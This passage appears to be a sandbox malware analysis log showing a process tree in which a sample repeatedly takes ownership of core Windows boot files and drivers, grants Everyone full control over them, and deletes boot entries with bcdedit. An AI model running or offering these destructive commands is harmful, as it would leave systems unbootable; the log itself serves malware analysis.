  PID:2188
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:288
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:2976
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2240
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1656
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:444
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2100
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:704
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1944
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:896
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:784
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2008
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1708
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1804
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1732
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1780
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:908
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1428
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2028
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:924
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:780
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2324
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2144
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:344
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:304
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:864
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:844
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:1936
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:1996
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:3056
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:1972
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2248
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1588
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1600
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:3060
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  - Modifies file permissions
  PID:1596
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:2568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2064
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2396
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2548
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2536
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2124
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2940
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2696
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:320
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:580
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2752
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2748
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2872
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2880
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2764
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:3016
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2908
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2044
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2472
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2724
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2820
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2920
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2780
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2640
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2988
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2776
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:2660
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Modifies file permissions
  PID:1940
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:272
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1800
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Modifies file permissions
  PID:1048
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1748
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2012
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2672
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2844
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1160
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:996
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2016
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1720
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:1384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2664
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:708
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1612
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:300
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:840
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2860
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2832
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:1156
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:820
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:1760
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2704
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2864
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2840
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2192
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2232
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2856
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Possible privilege escalation attempt
  PID:2972
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:588
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:2132
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2076
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2204
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Modifies file permissions
  PID:3048
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:288
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:2976
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2240
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:444
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2588
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2036
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1524
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1292
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1252
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2784
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2300
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:892
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:904
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2980
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:612
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2372
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:556
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:296
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:1364
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2572
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2304
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:1492
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2392
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2968
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1992
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1988
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:304
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2244
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:1744
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:1740
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2024
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:2056
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2460
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2116
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:1560
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:1592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2072
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2412
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2400
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2520
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2688
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2684
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:280
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2288
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1208
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2812
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2716
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:3024
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2868
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2712
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2804
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2732
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2876
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2892
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2740
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2788
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2768
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2368
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2996
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Possible privilege escalation attempt
  PID:2920
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2884
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:1632
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2616
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Modifies file permissions
  PID:2772
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1932
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1904
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1480
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:1112
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1676
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2148
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:268
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2428
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1584
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1176
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1408
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1720
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1644
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1452
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:1876
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2816
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:300
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:1900
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:1616
